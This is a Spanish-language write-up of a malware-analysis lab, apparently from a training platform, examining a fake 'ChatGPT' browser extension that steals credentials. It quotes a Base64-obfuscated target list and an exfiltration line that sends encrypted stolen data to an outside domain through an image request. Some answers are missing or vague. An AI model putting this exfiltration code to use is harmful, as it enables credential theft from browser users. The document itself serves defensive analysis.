Laboratorio FakeGPT

Categoría : Análisis de malware

Su equipo de ciberseguridad ha sido alertado sobre actividad sospechosa en la red de su organización. Varios empleados reportaron un comportamiento inusual en sus navegadores tras instalar lo que creían que era una extensión útil llamada "ChatGPT". Sin embargo, comenzaron a ocurrir cosas extrañas: se estaban comprometiendo cuentas y parecía que se estaba filtrando información confidencial.

Su tarea es realizar un análisis exhaustivo de esta extensión para identificar sus componentes maliciosos.

Lo que tenemos:

¿Qué método de codificación utiliza la extensión del navegador para ocultar las URL de destino, haciéndolas más difíciles de detectar durante el análisis?

El método de codificación que utiliza la extensión del navegador para ocultar las URL de destino y dificultar su detección durante el análisis es Base64.

Evidencia del uso de Base64:

En el fragmento de código proporcionado:

const targets = [_0xabc1('d3d3LmZhY2Vib29rLmNvbQ==')];

La cadena 'd3d3LmZhY2Vib29rLmNvbQ==' es una cadena codificada en Base64 que, al decodificarla, da como resultado:

https://www.base64decode.org/
www.facebook.com

Esto es una táctica común usada por extensiones maliciosas o scripts de malware para ocultar cadenas sensibles como URLs de destino.

¿Qué hace esto más difícil de detectar?

  • Las herramientas automáticas de análisis estático que no decodifican Base64 podrían pasar por alto dominios críticos como www.facebook.com.

  • Hace que la revisión manual sea más difícil si el analista no presta atención a patrones como el relleno ==.

¿Qué tipo de elemento HTML utiliza la extensión para enviar datos robados?

img.src = 'https://Mo.Elshaheedy.com/collect?data=' + encodeURIComponent(encryptedData);
El dominio completo que se usa para exfiltrar datos es:

Mo.Elshaheedy.com

¿Qué función del código se utiliza para filtrar las credenciales del usuario, incluido el nombre de usuario y la contraseña?

¿Qué algoritmo de cifrado se aplica para proteger los datos antes de enviarlos?

En este código, los datos se protegen mediante un algoritmo de cifrado conocido para proteger la información confidencial. Este algoritmo utiliza una clave secreta y un vector de inicialización (IV) para cifrar los datos, lo que genera una salida cifrada que se convierte a formato Base64 antes de su transmisión.

PreviousLaboratorio WebStrikeNextPage

Last updated